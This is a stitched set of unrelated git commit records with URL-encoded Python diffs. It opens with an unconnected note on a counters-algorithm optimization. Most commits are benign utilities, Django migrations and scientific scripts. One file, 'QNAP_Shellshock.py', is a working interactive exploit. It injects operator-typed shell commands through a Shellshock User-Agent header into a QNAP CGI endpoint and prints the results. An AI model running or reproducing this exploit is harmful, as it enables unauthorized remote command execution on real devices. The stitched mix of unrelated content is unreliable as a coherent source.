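The accepted solution rebuilds the whole counters list on every max-counter operation, which is O(N*M) in the worst case. The usual optimization keeps the reset value as a lazy floor and applies it on update and once at the end; a sketch:

# Lazy-max variant: track the floor set by max-counter operations
# instead of rewriting all N counters each time; O(N + M) overall.
def solution(N, A):
    counters = [0] * N
    max_counter = 0   # running global maximum
    floor = 0         # value every counter is implicitly raised to
    for elem in A:
        if elem == N + 1:
            floor = max_counter
        else:
            idx = elem - 1
            counters[idx] = max(counters[idx], floor) + 1
            max_counter = max(max_counter, counters[idx])
    return [max(c, floor) for c in counters]

assert solution(5, [3, 4, 4, 6, 1, 4, 4]) == [3, 2, 2, 4, 2]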
ce1d13bc6827f780e44491b630e64df7b52634f1
add vibration sensor code
gpio/vibration-sendor-test.py
gpio/vibration-sendor-test.py
Python
0
@@ -0,0 +1,640 @@ +import RPi.GPIO as GPIO%0Aimport time%0Aimport datetime%0A%0AGPIO.setwarnings(False)%0AGPIO.setmode(GPIO.BCM)%0AIN_PIN = 18%0ALED_PIN = 17%0A%0AGPIO.setup(IN_PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP) %0AGPIO.setup(LED_PIN, GPIO.OUT)%0A%0AGPIO.output(LED_PIN, GPIO.LOW)%0A%0Adef turn_on(led_pin):%0A GPIO.output(led_pin, GPIO.HIGH)%0A%0Adef turn_off(led_pin):%0A GPIO.output(led_pin, GPIO.LOW)%0A%0Acount = 0%0Awhile True:%0A i=GPIO.input(IN_PIN) %0A if(count == 1000):%0A turn_off(LED_PIN)%0A count += 1%0A if i==1: %0A print(datetime.datetime.now(), %22Vibration detected%22,i)%0A time.sleep(0.1)%0A count = 0%0A turn_on(LED_PIN)%0A
e7ef1806f84e6d07ef88ca23444f37cf6f50e014
Add a console-less version.
wxMailServer.pyw
wxMailServer.pyw
Python
0
@@ -0,0 +1,94 @@ +# -*- encoding: utf-8 -*-%0Afrom wxMailServer import main%0A%0Aif __name__ == %22__main__%22:%0A main()
b419f8c9f562d3d16a6079e949c47ec2adc4c97d
add utility script for merging test files
scripts/merge-tests.py
scripts/merge-tests.py
Python
0
@@ -0,0 +1,1367 @@ +import sys%0A%0Ac_includes = set()%0Acxx_includes = set()%0Ajive_includes = set()%0Alocal_includes = set()%0A%0Acode_blocks = %5B%5D%0A%0Adef mangle(fname):%0A%09name = fname%5B6:-2%5D%0A%09name = name.replace('/', '_')%0A%09name = name.replace('-', '_')%0A%09return name%0A%0Afor fname in sys.argv%5B1:%5D:%0A%09seen_includes = False%0A%09code_lines = %5B%5D%0A%09name = mangle(fname)%0A%09for line in file(fname).readlines():%0A%09%09line = line%5B:-1%5D%0A%09%09if line%5B:9%5D == %22#include %22:%0A%09%09%09include = line%5B9:%5D%0A%09%09%09if include%5B:6%5D == %22%3Cjive/%22:%0A%09%09%09%09jive_includes.add(include)%0A%09%09%09elif include%5B-3:%5D == %22.h%3E%22:%0A%09%09%09%09c_includes.add(include)%0A%09%09%09elif include%5B0%5D == '%22':%0A%09%09%09%09local_includes.add(include)%0A%09%09%09else:%0A%09%09%09%09cxx_includes.add(include)%0A%09%09%09seen_includes = True%0A%09%09%09continue%0A%09%09if not seen_includes: continue%0A%09%09line = line + '%5Cn'%0A%09%09if line == '%5Cn' and code_lines and code_lines%5B-1%5D == '%5Cn':%0A%09%09%09continue%0A%09%09line = line.replace('test_main', name)%0A%09%09code_lines.append(line)%0A%09code_blocks.append(''.join(code_lines))%0A%0Aout = sys.stdout%0A%0Aif local_includes:%0A%09for i in sorted(local_includes): out.write('#include %25s%5Cn' %25 i)%0A%09out.write('%5Cn')%0A%0Aif c_includes:%0A%09for i in sorted(c_includes): out.write('#include %25s%5Cn' %25 i)%0A%09out.write('%5Cn')%0A%0Aif cxx_includes:%0A%09for i in sorted(cxx_includes): out.write('#include %25s%5Cn' %25 i)%0A%09out.write('%5Cn')%0A%0Aif jive_includes:%0A%09for i in sorted(jive_includes): out.write('#include %25s%5Cn' %25 i)%0A%09out.write('%5Cn')%0A%0Afor c in code_blocks: out.write(c)%0A
62e17c30ba45458254c0da5b14582aeeac9eab4c
Add command to pre-generate all jpeg images
signbank/video/management/commands/makejpeg.py
signbank/video/management/commands/makejpeg.py
Python
0.000001
@@ -0,0 +1,612 @@ +%22%22%22Create JPEG images for all videos%22%22%22%0A%0Afrom django.core.exceptions import ImproperlyConfigured%0Afrom django.core.management.base import BaseCommand, CommandError %0Afrom django.conf import settings%0Afrom signbank.video.models import GlossVideo%0Aimport os%0A%0Aclass Command(BaseCommand):%0A    %0A    help = 'Create JPEG images for all videos'%0A    args = ''%0A%0A    def handle(self, *args, **options):%0A        %0A        # just access the poster path for each video%0A        for vid in GlossVideo.objects.all():%0A            p = vid.poster_path()%0A            print p%0A        %0A        else:%0A            print %22Usage makejpeg%22%0A%0A%0A
83d8199eccf7261a8e2f01f7665537ee31702f8c
Create QNAP_Shellshock.py
QNAP_Shellshock.py
QNAP_Shellshock.py
Python
0.000001
@@ -0,0 +1,487 @@ +#!/usr/bin/python%0Aimport socket%0A%0A%0Aprint %22QNAP exploit!%22%0Ainputstr=%22%22%0Aip=%22x.x.x.x%22 #Change IP Value%0Aport=8080%0A%0Awhile True:%0A%09s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)%0A%09inputstr=raw_input(%22cmd%3E %22)%0A%09s.connect((ip,port))%0A%09s.send(%22GET /cgi-bin/index.cgi HTTP/1.0%5CnHost: %22+ip+%22%5CnUser-Agent: () %7B :;%7D; echo; %22+inputstr+%22%5Cr%5Cn%5Cr%5Cn%22)%0A%09output=%22%22%0A%09while True:%0A%09%09buf=s.recv(4096)%0A%09%09if not buf:%0A%09%09%09break%09%09%0A%09%09output+=buf%0A%09indexHTML= output.find(%22html%22)%0A%09print output%5B0:indexHTML%5D%0A%09s.close()%09%0A
444efa0506034302b605107981b0db4b8d2c37cc
task urls
task/urls.py
task/urls.py
Python
0.999783
@@ -0,0 +1,311 @@ +from django.conf.urls import patterns, include, url%0Afrom task.views import Home, TaskView, TaskDetail%0A%0Aurlpatterns = patterns(%0A '',%0A url(r'%5E$', Home.as_view(), name='home'),%0A url(r'%5Etask/$', TaskView.as_view(), name='task'),%0A url(r'%5Etask/(?P%3Cpk%3E%5Cd+)/$', TaskDetail.as_view(), name='task_detail'),%0A)%0A
63c2c7a696aedb1b08d2478a2b84aec42f4364cf
Add tests for URLConverter
tests/bucket/test_url_converter.py
tests/bucket/test_url_converter.py
Python
0
@@ -0,0 +1,1045 @@ +from mrs.bucket import URLConverter%0A%0Adef test_local_to_global():%0A c = URLConverter('myhost', 42, '/my/path')%0A%0A url = c.local_to_global('/my/path/xyz.txt')%0A assert url == 'http://myhost:42/xyz.txt'%0A%0Adef test_local_to_global_outside_dir():%0A c = URLConverter('myhost', 42, '/my/path')%0A%0A url = c.local_to_global('/other/path/xyz.txt')%0A assert url == '/other/path/xyz.txt'%0A%0Adef test_global_to_local():%0A c = URLConverter('myhost', 42, '/my/path')%0A master = 'server:8080'%0A%0A url = c.global_to_local('http://myhost:42/xyz.txt', master)%0A assert url == '/my/path/xyz.txt'%0A%0Adef test_global_to_local_other():%0A c = URLConverter('myhost', 42, '/my/path')%0A master = 'server:8080'%0A%0A url = c.global_to_local('http://other:443/xyz.txt', master)%0A assert url == 'http://other:443/xyz.txt'%0A%0Adef test_global_to_local_master():%0A c = URLConverter('myhost', 42, '/my/path')%0A master = 'server:8080'%0A%0A url = c.global_to_local('http:///xyz.txt', master)%0A assert url == 'http://server:8080/xyz.txt'%0A%0A# vim: et sw=4 sts=4%0A
88cf8e30da6ab655dfc31b2fd88d26ef649e127d
add sha digest tool
getDigest.py
getDigest.py
Python
0
@@ -0,0 +1,641 @@ +#!/usr/bin/env python%0A# encoding: utf-8%0A%0Aimport sys%0Aimport hashlib%0A%0A%0Adef getDigest(file):%0A # BUF_SIZE is totally arbitrary, change for your app!%0A BUF_SIZE = 65536 # lets read stuff in 64kb chunks!%0A md5 = hashlib.md5()%0A sha1 = hashlib.sha1()%0A with open(file, 'rb') as f:%0A while True:%0A data = f.read(BUF_SIZE)%0A if not data:%0A break%0A md5.update(data)%0A sha1.update(data)%0A print(%22MD5: %7B0%7D%22.format(md5.hexdigest()))%0A print(%22SHA1: %7B0%7D%22.format(sha1.hexdigest()))%0A%0A%0Adef main(argv):%0A getDigest(argv)%0A%0A%0Aif __name__ == '__main__':%0A sys.exit(main(sys.argv%5B1%5D))%0A
e9acbc2e1423084ddd4241e2fbdcc7fcbf02ad6d
add empty migration as data migration
coupons/migrations/0005_auto_20151105_1502.py
coupons/migrations/0005_auto_20151105_1502.py
Python
0.000007
@@ -0,0 +1,249 @@ +# -*- coding: utf-8 -*-%0Afrom __future__ import unicode_literals%0A%0Afrom django.db import migrations, models%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('coupons', '0004_auto_20151105_1456'),%0A %5D%0A%0A operations = %5B%0A %5D%0A
3004dec0e0deadc4df61bafb233cd6b277c9bfef
Add a small utility that creates an index on the MongoDB collection, specifically on the Steam ID number key
util/create_mongodb_index.py
util/create_mongodb_index.py
Python
0
@@ -0,0 +1,1441 @@ +#!/usr/env python3.4%0Aimport sys%0Afrom pymongo import ASCENDING%0Afrom util.mongodb import connect_to_db%0Afrom argparse import (ArgumentParser,%0A ArgumentDefaultsHelpFormatter)%0A%0Adef main(argv=None):%0A parser = ArgumentParser(description='Run incremental learning '%0A 'experiments.',%0A formatter_class=ArgumentDefaultsHelpFormatter,%0A conflict_handler='resolve')%0A parser.add_argument('-dbhost', '--mongodb_host',%0A help='Host that the MongoDB server is running on.',%0A type=str,%0A default='localhost')%0A parser.add_argument('--mongodb_port', '-dbport',%0A help='Port that the MongoDB server is running on.',%0A type=int,%0A default=37017)%0A args = parser.parse_args()%0A%0A # Connect to MongoDB database%0A print('Connecting to MongoDB database at %7B%7D:%7B%7D...'%0A .format(args.mongodb_host,%0A args.mongodb_port),%0A file=sys.stderr)%0A db = connect_to_db(args.mongodb_host,%0A args.mongodb_port)%0A%0A # Create index on 'steam_id_number' so that cursors can be sorted%0A # on that particular key%0A print('Creating index on the %22steam_id_number%22 key...',%0A file=sys.stderr)%0A db.create_index('steam_id_number', ASCENDING)%0A print('Created new index %22steam_id_number_1%22 in reviews '%0A 'collection.',%0A file=sys.stderr)%0A
3da9953aa453281fd55ada75b2ed40fce8d9df6c
Create screen_op.py
screen_op.py
screen_op.py
Python
0.000003
@@ -0,0 +1,3563 @@ +#-------------------------------------------------------------------------------%0A#%0A# Controls shed weather station%0A#%0A# The MIT License (MIT)%0A#%0A# Copyright (c) 2015 William De Freitas%0A# %0A# Permission is hereby granted, free of charge, to any person obtaining a copy%0A# of this software and associated documentation files (the %22Software%22), to deal%0A# in the Software without restriction, including without limitation the rights%0A# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell%0A# copies of the Software, and to permit persons to whom the Software is%0A# furnished to do so, subject to the following conditions:%0A# %0A# The above copyright notice and this permission notice shall be included in all%0A# copies or substantial portions of the Software.%0A# %0A# THE SOFTWARE IS PROVIDED %22AS IS%22, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR%0A# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,%0A# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE%0A# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER%0A# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,%0A# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE%0A# SOFTWARE.%0A#%0A#-------------------------------------------------------------------------------%0A%0A#!usr/bin/env python%0A%0A#===============================================================================%0A# Import modules%0A#===============================================================================%0Aimport os%0Aimport settings as s%0A%0A %0A#===============================================================================%0A# DRAW SCREEN%0A#===============================================================================%0Adef draw_screen(sensors, thingspeak_enable, key, rrd_enable, rrd_set):%0A    %0A    os.system('clear')%0A    %0A    display_string = %5B%5D%0A    %0A    display_string.append('WEATHER STATION')%0A    display_string.append('')%0A    display_string.append('Next precip. acc. reset at '+ str(s.PRECIP_ACC_RESET_TIME))%0A%0A    #Display thingspeak field data set up%0A    if thingspeak_enable:%0A        display_string.append('')%0A        display_string.append('Thingspeak write api key: '+key)%0A        display_string.append('')%0A        display_string.append('Thingspeak field set up:')%0A        display_string.append('  Field%5CtName%5Ct%5CtValue%5CtUnit')%0A        display_string.append('  ---------------------------------------')%0A        for key, value in sorted(sensors.items(), key=lambda e: e%5B1%5D%5B0%5D):%0A            display_string.append('  ' + str(value%5Bs.TS_FIELD%5D) + '%5Ct' + key + %0A                                    '%5Ct' + str(value%5Bs.VALUE%5D) + '%5Ct' + value%5Bs.UNIT%5D)%0A    %0A    #Display RRDtool set up%0A    if rrd_enable:%0A        display_string.append('')%0A        display_string.append('RRDtool set up:')%0A        for i in range(0,len(rrd_set)):%0A            display_string += rrd_set%5Bi%5D%0A        display_string.append('')%0A%0A    #Create table header%0A    display_string.append('')%0A    header ='Date%5Ct%5CtTime%5Ct%5Ct'%0A    header_names = ''%0A    for key, value in sorted(sensors.items(), key=lambda e: e%5B1%5D%5B0%5D):%0A        header_names = header_names + key +'%5Ct'%0A    header = header + header_names + 'TS Send'%0A    display_string.append(header)%0A    display_string.append('=' * (len(header) + 5 * header.count('%5Ct')))%0A    %0A    #Find the total number of rows on screen%0A    rows, columns = os.popen('stty size', 'r').read().split()%0A    %0A    #Draw screen%0A    print('%5Cn'.join(display_string))%0A    %0A    #Return number of rows left for data%0A    return(int(rows) - len(display_string))%0A%0A
754dc2a5bc26a555576970a494a9de0e5026fae1
Add DTFT demo
dtft.py
dtft.py
Python
0
@@ -0,0 +1,1927 @@ +#!/usr/bin/env python3%0A%22%22%22%0AUsing a typical FFT routine and showing the principle%0Abehind the DTFT computation.%0A%0A%22%22%22%0Aimport numpy as np%0Afrom matplotlib import pyplot%0A%0A##################################################%0A%0A# Efficient practical usage%0Adef fft(values, dt):%0A freqs = np.fft.rfftfreq(len(values), dt)%0A coeffs = np.sqrt(2/len(values)) * np.fft.rfft(values) # scaled for unitarity%0A coeffs%5B0%5D /= np.sqrt(2) # don't %22double count%22 the DC alias%0A return (freqs, coeffs)%0A%0A# Working principle%0Adef dtft(values, dt):%0A times = dt * np.arange(len(values))%0A nyquist = 1/(2*dt)%0A dw = 1/(dt*len(values))%0A freqs = np.arange(0.0, nyquist+dw, dw)%0A # (rad/s)/Hz all w*t products%0A dtft_matrix = np.exp(-1j * (2*np.pi) * np.outer(freqs, times))%0A coeffs = np.sqrt(2/len(values)) * dtft_matrix.dot(values) # scaled for unitarity%0A coeffs%5B0%5D /= np.sqrt(2) # don't %22double count%22 the DC alias%0A return (freqs, coeffs)%0A%0A##################################################%0A%0Adef function(time):%0A w = 20*np.pi%0A value = 0.0%0A for k in range(5):%0A value += (k+1)*np.cos((k*w)*time)%0A return value%0A%0Adt = 0.001%0Atimes = np.arange(0.0, 0.2, dt)%0Avalues = function(times)%0A%0A##################################################%0A%0Afft_freqs, fft_coeffs = fft(values, dt)%0Adtft_freqs, dtft_coeffs = dtft(values, dt)%0A%0Aassert np.allclose(fft_freqs, dtft_freqs)%0Aassert np.allclose(fft_coeffs, dtft_coeffs)%0A%0A##################################################%0A%0A# Demonstrate Parseval's theorem%0Aprint(np.linalg.norm(values))%0Aprint(np.linalg.norm(dtft_coeffs))%0A%0A##################################################%0A%0Afig = pyplot.figure()%0A%0Aax = fig.add_subplot(2, 1, 1)%0Aax.plot(times, values)%0Aax.set_xlabel(%22Time (s)%22, fontsize=16)%0Aax.grid(True)%0A%0Aax = fig.add_subplot(2, 1, 2)%0Aax.scatter(dtft_freqs, np.abs(dtft_coeffs))%0Aax.set_xlabel(%22Freq (Hz)%22, fontsize=16)%0Aax.grid(True)%0A%0Apyplot.show()%0A
f342a3bb330eab74f31f632c81792f93a6e086e8
Add a script to automate the generation of source distributions for Windows and Linux.
create_distributions.py
create_distributions.py
Python
0
@@ -0,0 +1,1618 @@ +%22%22%22Script to automate the creation of Windows and Linux source distributions.%0A%0AThe TOPKAPI_example directory is also copied and the .svn directories stripped%0Ato make a clean distribution. The manual is included in MSWord format for now%0Abecause this is how it's stored in SVN.%0A%0AThis script currently relies on Linux tools and will only work on a Linux%0Asystem for now.%0A%0A%22%22%22%0Aimport os%0Aimport shutil%0A%0Acommand = 'find . -name .svn -type d -print0 %7C xargs -0 rm -rf'%0A%0Adef make_distro(dist_path, ex_path, files):%0A    path = os.path.join(dist_path, ex_path)%0A    %0A    if os.path.isdir(dist_path):%0A        for root, dirs, fnames in os.walk(dist_path, topdown=False):%0A            for name in fnames:%0A                os.remove(os.path.join(root, name))%0A            for name in dirs:%0A                os.rmdir(os.path.join(root, name))%0A    %0A    shutil.copytree(ex_path, path)%0A    curr_dir = os.getcwd()%0A    os.chdir(path)%0A    os.system(command)%0A    os.chdir(curr_dir)%0A    %0A    for fname in files:%0A        shutil.copy(fname, dist_path)%0A    %0Aif __name__ == %22__main__%22:%0A    # make sure the source distributions are built%0A    os.system('python setup.py sdist --formats=gztar,zip')%0A    %0A    # make Linux distribution%0A    dist_path = 'TOPKAPI_linux'%0A    ex_path = 'TOPKAPI_Example'%0A    linux_files = %5B'dist/TOPKAPI-0.1.tar.gz', 'TOPKAPI_Manual.doc'%5D%0A    %0A    make_distro(dist_path, ex_path, linux_files)%0A    %0A    # make Windows distribution%0A    dist_path = 'TOPKAPI_windows'%0A    ex_path = 'TOPKAPI_Example'%0A    windows_files = %5B'dist/TOPKAPI-0.1.zip', 'TOPKAPI_Manual.doc'%5D%0A    %0A    make_distro(dist_path, ex_path, windows_files)%0A
6fd4aefcc70e28d96d7110a903328f24b6fea5e4
bring back the in-RAM version; it uses less RAM, but still too much to handle 10M entries, I think
zorin/mreport.py
zorin/mreport.py
Python
0
@@ -0,0 +1,2401 @@ +import sys%0Aimport json%0A%0Aclass Site(object):%0A%0A def __init__(self):%0A self.op_events = %7B%7D%0A self.chats = set()%0A self.emails = set()%0A self.operators = set()%0A self.visitors = set()%0A%0A def add_operator_event(self, ts, op, state):%0A self.op_events%5Bop%5D = sorted(set(self.op_events.get(op, %5B%5D) + %5B(ts, state)%5D))%0A self.operators.add(op)%0A %0A def get_state(self, time_stamp):%0A states = %5B%5D%0A for op, events in self.op_events.items():%0A prev_state = False%0A for ts, state in events:%0A if ts %3E time_stamp:%0A break%0A prev_state = state%0A states.append(prev_state)%0A return True if True in states else False%0A%0A def add_chat(self, time_stamp, visitor):%0A if time_stamp in self.chats or time_stamp in self.emails:%0A return%0A state = self.get_state(time_stamp)%0A if state:%0A self.chats.add(time_stamp)%0A else:%0A self.emails.add(time_stamp)%0A self.visitors.add(visitor)%0A%0A def report(self, site_id):%0A print %22%7Bsite_id%7D,messages=%7Bmessages%7D,emails=%7Bemails%7D,operators=%7Boperators%7D,visitors=%7Bvisitors%7D%22.format(%0A site_id=site_id, messages=len(self.chats), emails=len(self.emails), %0A operators=len(self.operators), visitors=len(self.visitors))%0A%0Adef main():%0A fname = sys.argv%5B1%5D%0A%0A iterations = %5B%5D%0A%0A for iter in range(0,15): %0A%0A sites = %7B%7D%0A iterations.append(sites)%0A %0A with open(fname) as f:%0A for line in f.readlines():%0A data = json.loads(line)%0A site_id = data%5B'site_id'%5D%0A site = sites.setdefault(site_id, Site())%0A if data%5B'type'%5D == 'status':%0A status = True if data%5B'data'%5D%5B'status'%5D == 'online' else False%0A site.add_operator_event(int(data%5B'timestamp'%5D), intern(str(data%5B'from'%5D)), status)%0A %0A with open(fname) as f:%0A for line in f.readlines():%0A data = json.loads(line.strip())%0A site_id = data%5B'site_id'%5D%0A site = sites%5Bsite_id%5D%0A if data%5B'type'%5D == 'message':%0A site.add_chat(int(data%5B'timestamp'%5D), intern(str(data%5B'from'%5D)))%0A%0A# for site_id, site in sorted(sites.items(), key=lambda _e: _e%5B0%5D):%0A# site.report(site_id)%0A raw_input(%22Press Enter to continue...%22)%0A%0A print iterations%0A%0Aif __name__ == '__main__':%0A main()%0A%0A
a038d9e204bd54e69d5a84427bc9a56b04583460
Create restart script
dbaas/maintenance/scripts/restart_database.py
dbaas/maintenance/scripts/restart_database.py
Python
0.000001
@@ -0,0 +1,1388 @@ +from datetime import date, timedelta%0A%0Afrom maintenance.models import TaskSchedule%0Afrom logical.models import Database%0A%0A%0Adef register_schedule_task_restart_database(hostnames):%0A    today = date.today()%0A    try:%0A        databases = Database.objects.filter(%0A            databaseinfra__instances__hostname__hostname__in=hostnames%0A        ).distinct()%0A        for database in databases:%0A            print(%22Checking database %7B%7D%22.format(database.name))%0A            scheduled_tasks = TaskSchedule.objects.filter(%0A                status=TaskSchedule.SCHEDULED,%0A                database=database,%0A                method_path='restart_database'%0A            )%0A            if scheduled_tasks:%0A                print(%22Already scheduled for database %7B%7D!%22.format(%0A                    database.name)%0A                )%0A            else:%0A                task = TaskSchedule.objects.create(%0A                    method_path='restart_database',%0A                    scheduled_for=TaskSchedule.next_maintenance_window(%0A                        today + timedelta(days=2),%0A                        database.databaseinfra.maintenance_window,%0A                        database.databaseinfra.maintenance_day%0A                    ),%0A                    database=database%0A                )%0A                task.send_mail(is_new=True)%0A        print(%22Done%22)%0A    except Exception as err:%0A        print(%22Error: %7B%7D%22.format(err))%0A
93a396fdfc2b4a9f83ffbeb38c6f5a574f61478e
Add initial MeSH update script
scripts/update_mesh.py
scripts/update_mesh.py
Python
0
@@ -0,0 +1,3092 @@ +import os%0Aimport re%0Aimport csv%0Aimport gzip%0Aimport xml.etree.ElementTree as ET%0Afrom urllib.request import urlretrieve%0A%0A%0Adef _get_term_names(record, name):%0A # We then need to look for additional terms related to the%0A # preferred concept to get additional names%0A concepts = record.findall('ConceptList/Concept')%0A all_term_names = %5B%5D%0A for concept in concepts:%0A # We only look at the preferred concept here%0A if concept.attrib%5B'PreferredConceptYN'%5D == 'Y':%0A terms = concept.findall('TermList/Term')%0A for term in terms:%0A term_name = term.find('String').text%0A if term_name != name:%0A all_term_names.append(term_name)%0A return all_term_names%0A%0A%0Adef get_mesh_names(et):%0A names = %7B%7D%0A for record in et.iterfind('DescriptorRecord'):%0A # We first get the ID and the name%0A uid = record.find('DescriptorUI').text%0A tree_numbers = record.findall('TreeNumberList/TreeNumber')%0A # Diseases are in the C subtree%0A if not any(t.text%5B0%5D == 'C' for t in tree_numbers):%0A continue%0A name = record.find('DescriptorName/String').text%0A synonyms = _get_term_names(record, name)%0A names%5Buid%5D = %5Bname%5D + synonyms%0A return names%0A%0A%0Adef entries_from_names(names):%0A entries = %5B%5D%0A for uid, synonyms in names.items():%0A for synonym in synonyms:%0A entries.append((synonym, uid))%0A print('Got a total of %25d entries' %25 len(entries))%0A return entries%0A%0A%0Adef load_mesh_resource_file():%0A url = 'ftp://nlmpubs.nlm.nih.gov/online/mesh/2019/xmlmesh/desc2019.gz'%0A desc_path = os.path.join(here, 'mesh_desc2019.gz')%0A if not os.path.exists(desc_path):%0A print('Download MeSH descriptors from %25s' %25 url)%0A urlretrieve(url, desc_path)%0A print('Done downloading MeSH descriptors')%0A # Process the XML and find descriptor records%0A with gzip.open(desc_path) as desc_file:%0A print('Parsing MeSH descriptors')%0A et = ET.parse(desc_file)%0A return et%0A%0A%0Aif __name__ == '__main__':%0A # Basic positioning%0A here = os.path.dirname(os.path.abspath(__file__))%0A kb_dir = os.path.join(here, os.pardir, 'src', 'main', 'resources', 'org',%0A 'clulab', 'reach', 'kb')%0A resource_fname = os.path.join(kb_dir, 'mesh_disease.tsv')%0A%0A et = load_mesh_resource_file()%0A mesh_names = get_mesh_names(et)%0A%0A # We sort the entries first by the synonym but in a way that special%0A # characters and capitalization are ignored, then sort by ID%0A entries = entries_from_names(mesh_names)%0A entries = sorted(entries, key=(lambda x:%0A (re.sub('%5B%5EA-Za-z0-9%5D', '', x%5B0%5D).lower(),%0A x%5B1%5D)))%0A # Now dump the entries into an updated TSV file%0A with open(resource_fname, 'w') as fh:%0A writer = csv.writer(fh, delimiter='%5Ct')%0A for entry in entries:%0A writer.writerow(entry)%0A%0A with open(resource_fname, 'rb') as f1, %5C%0A gzip.open(resource_fname + '.gz', 'wb') as f2:%0A f2.writelines(f1)%0A
b28feb542a34cec9ae9d21b1efed5676dcab8956
Make ContestParticipation.user not nullable; #428
judge/migrations/0030_remove_contest_profile.py
judge/migrations/0030_remove_contest_profile.py
# -*- coding: utf-8 -*- # Generated by Django 1.9.7 on 2016-07-31 18:13 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion def move_current_contest_to_profile(apps, schema_editor): ContestProfile = apps.get_model('judge', 'ContestProfile') db_alias = schema_editor.connection.alias for cp in ContestProfile.objects.using(db_alias).exclude(current=None).select_related('user'): cp.user.current_contest_id = cp.current_id cp.user.save() def move_current_contest_to_contest_profile(apps, schema_editor): ContestProfile = apps.get_model('judge', 'ContestProfile') Profile = apps.get_model('judge', 'Profile') db_alias = schema_editor.connection.alias for profile in Profile.objects.using(db_alias).exclude(current_contest=None): cp = ContestProfile.objects.get_or_create(user=profile)[0] cp.current_id = profile.current_contest_id cp.save() def contest_participation_to_profile(apps, schema_editor): ContestParticipation = apps.get_model('judge', 'ContestParticipation') db_alias = schema_editor.connection.alias for cp in ContestParticipation.objects.using(db_alias).select_related('profile'): cp.user_id = cp.profile.user_id cp.save() def contest_participation_to_contest_profile(apps, schema_editor): ContestParticipation = apps.get_model('judge', 'ContestParticipation') ContestProfile = apps.get_model('judge', 'ContestProfile') db_alias = schema_editor.connection.alias for cp in ContestParticipation.objects.using(db_alias).select_related('profile'): cp.profile = ContestProfile.objects.get_or_create(user_id=cp.user_id)[0] cp.save() class Migration(migrations.Migration): dependencies = [ ('judge', '0029_problem_translation'), ] operations = [ migrations.AddField( model_name='profile', name='current_contest', field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='judge.ContestParticipation', verbose_name='Current contest'), ), migrations.RunPython(move_current_contest_to_profile, move_current_contest_to_contest_profile), migrations.AddField( model_name='contestparticipation', name='user', field=models.ForeignKey(null=True, db_index=True, on_delete=django.db.models.deletion.CASCADE, related_name='contest_history', to='judge.Profile', verbose_name='user'), preserve_default=False, ), migrations.AlterField( model_name='contestparticipation', name='profile', field=models.ForeignKey(to='judge.ContestProfile', verbose_name='User', related_name='contest_history', null=True, on_delete=django.db.models.deletion.CASCADE), ), migrations.RunPython(contest_participation_to_profile, contest_participation_to_contest_profile), migrations.RemoveField( model_name='contestparticipation', name='profile', ), migrations.DeleteModel(name='contestprofile'), ]
Python
0.000103
@@ -2072,16 +2072,55 @@ ET_NULL, +%0A related @@ -2162,16 +2162,55 @@ pation', +%0A verbose @@ -2557,16 +2557,52 @@ CASCADE, +%0A related @@ -2936,16 +2936,52 @@ istory', +%0A null=Tr @@ -3139,32 +3139,337 @@ ntest_profile),%0A + migrations.AlterField(%0A model_name='contestparticipation',%0A name='user',%0A field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='contest_history',%0A to='judge.Profile', verbose_name='user'),%0A ),%0A migratio
6ea2d5af752e4765be8ef433139f72538fa3a2dd
Check that relationships in SsWang are up-to-date
tests/test_semsim_wang_termwise.py
tests/test_semsim_wang_termwise.py
Python
0
@@ -0,0 +1,1998 @@ +#!/usr/bin/env python3%0A%22%22%22Test S-value for Table 1 in Wang_2007%22%22%22%0A%0A__copyright__ = %22Copyright (C) 2020-present, DV Klopfenstein. All rights reserved.%22%0A__author__ = %22DV Klopfenstein%22%0A%0Afrom os.path import join%0Afrom sys import stdout%0A%0Afrom goatools.base import get_godag%0Afrom goatools.semsim.termwise.wang import SsWang%0Afrom goatools.godag.consts import RELATIONSHIP_SET%0A%0Afrom tests.utils import REPO%0Afrom tests.data.ssWang.tbl1 import GO2SVALUE%0A%0A%0Adef test_semsim_wang(prt=stdout):%0A %22%22%22Wang Semantic Similarity tests%22%22%22%0A fin_godag = join(REPO, 'go-basic.obo')%0A run = Run(fin_godag, prt)%0A run.chk_relationships()%0A%0A%0Aclass Run:%0A %22%22%22Wang Semantic Similarity tests%22%22%22%0A%0A def __init__(self, fin_godag, prt):%0A self.godag = get_godag(fin_godag, optional_attrs=%5B'relationship'%5D, prt=prt)%0A%0A @staticmethod%0A def _chk_svalues_a(dag_a):%0A %22%22%22Check values against Table 1%22%22%22%0A assert len(dag_a.go2svalue) == len(GO2SVALUE)%0A for goid, svalue_act in dag_a.go2svalue.items():%0A svalue_exp = GO2SVALUE%5Bgoid%5D%0A assert abs(svalue_exp - svalue_act) %3C .001, 'MISMATCH EXP(%7B%7D) != ACT(%7B%7D)'.format(%0A svalue_exp, svalue_act)%0A%0A def chk_relationships(self):%0A %22%22%22Check that actual relationships are expected%22%22%22%0A rels_all = set()%0A for goterm in self.godag.values():%0A rels_cur = goterm.relationship.keys()%0A if rels_cur:%0A rels_all.update(rels_cur)%0A assert rels_all == RELATIONSHIP_SET, 'UNEXPECTED RELATIONSHIPS'%0A print('**PASSED: EXPECTED GODag RELATIONSHIPS: %7BR%7D'.format(R=sorted(rels_all)))%0A rels_all.add('is_a')%0A rels_act = set(SsWang.dflt_rel2scf.keys())%0A assert rels_all == rels_act, 'BAD SsWang RELATIONSHIPS: %7BRs%7D'.format(Rs=rels_act)%0A print('**PASSED: EXPECTED SsWang RELATIONSHIPS: %7BR%7D'.format(R=sorted(rels_act)))%0A%0A%0Aif __name__ == '__main__':%0A test_semsim_wang()%0A%0A# Copyright (C) 2020-present DV Klopfenstein. All rights reserved.%0A
43eb87c1297ac9999f027f275bce94b3e8f4894e
add problem
